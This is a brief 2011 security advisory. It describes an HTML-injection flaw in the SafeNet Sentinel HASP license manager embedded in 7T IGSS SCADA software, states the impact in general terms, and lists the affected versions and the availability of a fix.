7T IGSS / SafeNet Sentinel Input Santization Vulnerability
December 12, 2011
Security research Carlos Mario Penagos Hollman of
Synapse-labs has identified an input santization
vulnerability in the third-party SafeNet Sentinel HASP
Software Rights Management (HASP-SRM) license manager
application that is embedded in the 7 Technologies (7T) IGSS
SCADA software.
SafeNet Sentinel HASP and 7T IGSS are prone to an
HTML-injection vulnerability because they fail to properly
sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in
the context of the affected site, potentially allowing the
attacker to steal cookie-based authentication credentials or
control how the site is rendered to the user; other attacks
are also possible, including allowing an attacker to change
the code in a configuration file.
SafeNet has produced an updated version that mitigates this
vulnerability, which has also been tested by the research.
Affected products include:
- SafeNet Sentinel HASP SDK releases older than
Version 5.11
- Sentinel HASP Runtime installers older than Version
6.x
- 7 Technologies (7T) IGSS Version 7